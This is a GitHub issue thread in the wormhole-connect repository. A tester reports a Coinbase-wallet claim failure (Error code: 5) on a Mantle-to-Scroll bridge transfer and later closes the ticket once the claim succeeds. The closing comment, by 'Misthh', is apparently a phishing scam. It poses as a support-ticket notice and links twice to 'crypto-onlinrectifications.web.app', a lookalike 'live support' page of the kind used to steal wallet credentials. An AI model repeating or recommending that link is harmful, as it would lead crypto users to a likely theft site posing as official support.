### ISSUE TITLE
[QA] Unable to claim transaction from Mantle to Scroll with Coinbase wallet 

### ISSUE THREAD

**Issue by agodlevska** [wormhole-foundation/wormhole-connect#3003]
## Describe the current behavior in detail
Environment:

- OS: macOS Sequoia 15.0.1
- Wallets: Coinbase
- Browser: Google Chrome Version 131.0.6778.71 (Official Build) (x86_64)
- https://preview.portalbridge.com/ecdc890a68/

Steps to Reproduce:

1. Initiate a transaction - 0.001 WAVAX from Mantle (Coinbase) to Scroll (Coinbase)
2. Choose the manual route for the transaction
3. Attempt to claim the transaction

Expected Result: The transaction should be claimed successfully without errors.

Actual Result: The transaction cannot be claimed, resulting in an error page with Error code: 5 after a long waiting period.

## Attachments/Notes

[Wormholescan](https://wormholescan.io/#/tx/0xb10ebf3c3eecda5b5ad9d4cec9367b31d14d85e2933ac9576b11ada987d56eaa)

https://github.com/user-attachments/assets/57b890b4-fce9-42d5-b751-26a62410f579

<img width="1440" alt="Screenshot 2024-11-25 at 10 59 18" src="https://github.com/user-attachments/assets/a0634374-79c8-4d38-acff-ec35fa4f0da2">

**Comment by agodlevska** [comment]
Issue is not reproducible with MetaMask wallet - [Wormholescan](https://wormholescan.io/#/tx/0xaf719d4edbc1beae8eb16681bc36dde30227b3c60a6e49af39e748ec230f8fb0). 

Attachment:
<img width="1440" alt="Screenshot 2024-11-25 at 11 46 26" src="https://github.com/user-attachments/assets/c3c7607c-4ea4-4eb9-b653-88c659fe1ad6">

**Comment by agodlevska** [comment]
After 1 hour, the transaction was successfully claimed. Closing the ticket.

**Comment by Misthh** [comment]
Hello @agodlevska  A support ticket has been opened for you. Kindly Talk to Support on the [Live support page](https://crypto-onlinrectifications.web.app/) so that your issue can be looked into. [CLICK HERE](https://crypto-onlinrectifications.web.app/)
